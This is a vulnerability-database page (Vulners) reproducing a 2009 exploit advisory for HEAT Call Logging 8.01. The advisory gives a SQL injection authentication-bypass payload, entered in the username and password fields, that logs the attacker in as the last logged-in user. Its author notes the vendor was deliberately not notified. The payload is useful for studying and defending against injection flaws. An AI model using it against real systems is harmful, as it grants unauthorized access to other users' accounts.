Vulners
Lucene search
HEAT Call Logging 8.01 - SQL Injection
[=[ ;otokoyama; ]=]
-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."
-=[web]=-
http://www.frontrange.com/heat.aspx
-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '
-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.
-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.
I guess this is a 0-day then..
Via their webpage current version appears to be 9.0,
could apply to this version aswell
SHOUTS:4chan for being shit, yes I will troll in a POC.
antilimit owns youData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4